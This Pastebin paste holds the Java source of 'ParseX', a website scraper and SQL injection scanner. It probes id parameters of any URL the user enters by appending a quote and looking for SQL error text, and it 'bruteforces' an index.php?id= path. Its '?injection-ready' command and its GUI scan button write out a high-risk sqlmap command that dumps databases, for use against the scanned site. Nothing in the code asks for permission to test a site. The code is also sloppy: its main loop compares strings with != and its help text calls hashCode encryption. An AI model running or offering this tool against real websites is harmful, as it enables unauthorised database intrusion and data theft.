Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import java.awt.Dimension;
- import java.awt.FlowLayout;
- import java.awt.event.ActionEvent;
- import java.awt.event.ActionListener;
- import java.io.*;
- import java.net.*;
- import org.jsoup.HttpStatusException;
- import org.jsoup.Jsoup;
- import org.jsoup.nodes.Document;
- import org.jsoup.select.Elements;
- import org.jsoup.nodes.Element;
- import javax.swing.*;
- public class testing implements Runnable,ActionListener{
- PrintWriter writer;
- PrintWriter htmlpainter;
- BufferedReader reader;
- String str;
- String message;
- String source;
- String page;
- String command;
- String url;
- String secondaryurl;
- int hash;
- static int time;
- JFrame frame;
- JTextPane pane;
- JButton button;
- Document doc;
- Document vuln;
- Document docx;
- Thread t1;
- InetAddress address;
- String link;
- String idoption;
- String string;
- Elements e;
- String cssquery;
- public void run(){
- for(time=0;time>=0;time++){
- try{
- Thread.sleep(1000);
- }catch(InterruptedException e){System.out.println(e.getMessage()+"Thread interrupted.");}
- }
- }
- public void searchCore()throws IOException{
- Java java=new Java();
- reader=new BufferedReader(new InputStreamReader(System.in));
- t1=new Thread(new testing());
- System.out.println("<ParseX>\n");
- t1.start();
- System.out.print("Choose name of website to be tested: ");
- url=reader.readLine();
- System.out.print("Choose name of secondary url: ");
- secondaryurl=reader.readLine();
- try{
- doc=Jsoup.connect(url).get();
- }
- catch(IllegalArgumentException | HttpStatusException | SocketTimeoutException s){System.out.println(s.getMessage()+" -Wrong url syntax.Provide http:// prefix, or could not connect.");}
- System.out.println("Connected.");
- do{
- System.out.print(">");
- command=reader.readLine();
- //SIMPLE//
- if(command.equals("?getnode"))
- System.out.println(doc.nodeName());
- if(command.equals("?getname"))
- System.out.println(doc.title());
- if(command.equals("?gettag"))
- System.out.println(doc.tag());
- if(command.equals("?help"))
- java.help();
- if(command.equals("?printsource")){
- source=doc.html();
- System.out.println(source);
- }
- if(command.equals("?printpage")){
- page=doc.text();
- System.out.println(page);
- }
- if(command.equals("?session"))
- System.out.println(time+" seconds.");
- if(command.equals("!execute"))
- System.exit(0);
- if(command.equals("?getall")){
- System.out.println("Node: "+doc.nodeName());
- System.out.println("Name: "+doc.title());
- System.out.println("Tag: "+doc.tag());
- }
- if(command.equals("?gethash")){
- hash=url.hashCode();
- System.out.println(url+": "+hash);
- }
- if(command.equals("?getip")){
- try{
- address=InetAddress.getByName(secondaryurl);
- System.out.println(address);
- }
- catch(UnknownHostException e){System.out.println(e.getMessage()+" -wrong name of host.");}
- }
- if(command.endsWith("test")&&!command.equals("test"))
- System.out.println("Repair testX.Does not work properly.");
- if(command.equals("?codestr")){
- System.out.print("Insert string: ");
- string=reader.readLine();
- System.out.println(string+": "+string.hashCode());
- }
- //MAIN//
- if(command.equals("?getsource")){
- writer=new PrintWriter(System.getProperty("user.dir") + "\\" + "SRC.txt");
- source=doc.html();
- writer.write(source);
- writer.close();
- System.out.println("Done.");
- }
- if(command.equals("?getpage")){
- writer=new PrintWriter(System.getProperty("user.dir") + "\\" + "TEXT.txt");
- page=doc.text();
- writer.write(page);
- writer.close();
- System.out.println("Done.");
- }
- if(command.equals("?isvulnerable")){
- if(url.contains("id")||url.contains("ID")){
- try{
- vuln=Jsoup.connect(url+"'").get();
- }catch(IllegalArgumentException | HttpStatusException | SocketTimeoutException s){System.out.println(s.getMessage()+" -Wrong url syntax.Provide http:// prefix, or could not connect.");}
- message=vuln.text();
- if(message.contains("sql")||message.contains("Sql")||message.contains("SQL")||message.contains("mySQL")||message.contains("mysql")||message.contains("MySQL")){
- System.out.println("Website is SQLi vulnerable.");
- }
- else
- System.out.println("No SQLi vulnerable place found.");
- }
- else
- System.out.println("No parameter provided.");
- }
- if(command.equals("!bruteforce")){
- if(!url.contains("id")&&!url.contains("ID")){
- try{
- vuln=Jsoup.connect(url+"/index.php?id='").get();
- }catch(IllegalArgumentException | HttpStatusException | SocketTimeoutException s){System.out.println(s.getMessage()+" -Wrong url syntax.Provide http:// prefix, or could not connect.");}
- message=vuln.text();
- if(message.contains("sql")||message.contains("Sql")||message.contains("SQL")||message.contains("mySQL")||message.contains("mysql")||message.contains("MySQL")){
- System.out.println("Website is SQLi vulnerable (bruteforce).");
- }
- else
- System.out.println("No SQLi vulnerable place found.");
- }
- else
- System.out.println("Cannot force website to throw vulnerable subdomain- id is implemented.");
- }
- if(command.equals("?usesjvs")){
- source=doc.html();
- if(source.contains("javascript")||source.contains("function")){
- System.out.println("Website possibly uses javascript.");
- }
- else
- System.out.println("No javascript footprint found.");
- }
- if(command.equals("?usescss")){
- source=doc.html();
- if(source.contains("css")||source.contains("style")){
- System.out.println("Website possibly uses css styles.");
- }
- else
- System.out.println("No css footprint found.");
- }
- if(command.equals("?htmlversion")){
- source=doc.html();
- if(source.contains("!DOCTYPE")||source.contains("!doctype")){
- System.out.println("Website uses HTML 5.");
- }
- else{
- System.out.println("Website HTML version < 5.0.");
- }
- }
- if(command.equals("?getlinks")){
- htmlpainter=new PrintWriter(System.getProperty("user.dir") + "\\" + "LINKS.txt");
- Elements links=doc.select("a[href]");
- for(Element element : links){
- htmlpainter.print("\n"+element.attr("href")+" ");
- }
- htmlpainter.close();
- System.out.println("Done.");
- }
- if(command.equals("?printlinks")){
- Elements links=doc.select("a[href]");
- for(Element element : links){
- System.out.println("\n"+element.attr("href"));
- }
- }
- if(command.equals("?getimages")){
- htmlpainter=new PrintWriter(System.getProperty("user.dir") + "\\" + "IMGS.txt");
- Elements images=doc.select("img");
- for(Element element : images){
- htmlpainter.print("\n"+element.attr("src")+" ");
- }
- htmlpainter.close();
- System.out.println("Done.");
- }
- if(command.equals("?printimages")){
- Elements images=doc.select("img");
- for(Element element : images){
- System.out.println("\n"+element.attr("src"));
- }
- }
- if(command.equals("?injection-ready")){
- writer=new PrintWriter(System.getProperty("user.dir") + "\\" + "SCR.txt");
- System.out.print("Do you wish to provide id parameter? y/n:");
- idoption=reader.readLine();
- if(idoption.equals("y")){
- writer.println("python sqlmap.py -u "+url+" --random-agent --timeout=15 --keep-alive --threads=3 --level=5 --risk=3 --technique=BEUST --union-cols=20 --dbs --eta -v 2 --union-char=20 -p id");
- writer.close();
- }
- else{
- writer.println("python sqlmap.py -u "+url+" --random-agent --timeout=15 --keep-alive --threads=3 --level=5 --risk=3 --technique=BEUST --union-cols=20 --dbs --eta -v 2 --union-char=20 ");
- writer.close();
- }
- System.out.println("Done.");
- }
- if(command.equals("?countelement")){
- System.out.print("Insert name of element: ");
- cssquery=reader.readLine();
- e=doc.select(cssquery);
- if(e.size()>0)
- System.out.println("Source code contains "+e.size()+" element/s "+cssquery+".");
- else
- System.out.println("Source code does not contain element/s "+cssquery+".");
- }
- //STR FILTER//
- if(command.equals("?getsourcestr")){
- System.out.print("Insert string: ");
- str=reader.readLine();
- source=doc.html();
- if(source.contains(str)){
- System.out.println("Source code contains *"+str+"*.");
- }
- else
- System.out.println("Source code does not contain *"+str+"*.");
- }
- if(command.equals("?getpagestr")){
- System.out.print("Insert string: ");
- str=reader.readLine();
- page=doc.text();
- if(page.contains(str)){
- System.out.println("Page text contains *"+str+"*.");
- }
- else
- System.out.println("Page text does not contain *"+str+"*.");
- }
- //GUI-testX//
- frame=new JFrame("TestX");
- frame.setSize(500,120);
- frame.setVisible(false);
- frame.setLayout(new FlowLayout());
- pane=new JTextPane();
- pane.setPreferredSize(new Dimension(450,50));
- button=new JButton("Scan");
- button.setPreferredSize(new Dimension(200,20));
- button.addActionListener(this);
- frame.add(pane);
- frame.add(button);
- if(command.equals("?testX")){
- frame.setVisible(true);
- }
- }while(command!="disconnect");
- }
- public static void main(String args[])throws IOException{
- testing obj=new testing();
- obj.searchCore();
- }
- @Override
- public void actionPerformed(ActionEvent e){
- try{
- link=pane.getText();
- try{
- docx=Jsoup.connect(link+"'").get();
- }catch(IllegalArgumentException | HttpStatusException | SocketTimeoutException s){System.out.println(s.getMessage()+" -Wrong url syntax.Provide http:// prefix, or could not connect.");}
- message=docx.text();
- if(message.contains("sql")||message.contains("Sql")||message.contains("SQL")||message.contains("mySQL")||message.contains("mysql")||message.contains("MySQL")){
- pane.setText(pane.getText()+"\n"+"Website is SQLi vulnerable.");
- try{
- writer=new PrintWriter(System.getProperty("user.dir") + "\\" + "MAP.txt");
- }catch(FileNotFoundException fnf){System.out.println(fnf.getMessage()+" -no such a file in directory.");}
- writer.println("python sqlmap.py -u "+link+" --random-agent --timeout=15 --keep-alive --threads=3 --level=5 --risk=3 --technique=BEUST --union-cols=20 --dbs --eta -v 2 --union-char=20 -p id");
- writer.close();
- }
- else
- pane.setText(pane.getText()+"\n"+"No vulnerableness found.");
- }
- catch(IOException es){System.out.println(es);}
- }
- }
- public class Java{
- public void help(){
- System.out.println("ParseX is software used to analyse websites and search for SQLi vulnerableness.\n" +
- "It's also one-session-only software.Primary url- with http:// and/or parameter.\n" +
- "Secondary url- without both http:// and parameter.\n\n");
- System.out.println("?getname- get name of website.");
- System.out.println("?gettag- get tag of website.");
- System.out.println("?getnode- get node of website.");
- System.out.println("?getall- get name,tag and node.");
- System.out.println("?getsource- write source code of website to a text file.");
- System.out.println("?printsource- print source code to console.");
- System.out.println("?getpage- write website's text content to a text file.");
- System.out.println("?printpage- print website's text content to console.");
- System.out.println("?isvulnerable- find website's SQLi vulnerableness (provide id parameter).");
- System.out.println("!bruteforce- force website to throw SQLi vulnerable subdomain (less effective).");
- System.out.println("?injection-ready- write sqlmap-based script to text file.");
- System.out.println("?getsourcestr- find certain String in source code.");
- System.out.println("?getpagestr- find certain String in textual content.");
- System.out.println("?getlinks- find all links of website from <a href> tag.");
- System.out.println("?printlinks- print all links of website to a console.");
- System.out.println("?getimages- get all image links from <img src> tag.");
- System.out.println("?printimges- print all image links to console.");
- System.out.println("?gethash- encrypt name of website into numeric hash.");
- System.out.println("?usesjvs/usescss- find out if website uses javascript or css language.");
- System.out.println("?htmlversion- find out if website uses HTML <= 5.0.");
- System.out.println("?getip- get ip address of website.");
- System.out.println("?session- get current session time.");
- System.out.println("?testX- start separate testX software to scan if any website is vulnerable.");
- System.out.println("!execute- execute current session.");
- System.out.println("?codestr- encode string to hash value.");
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement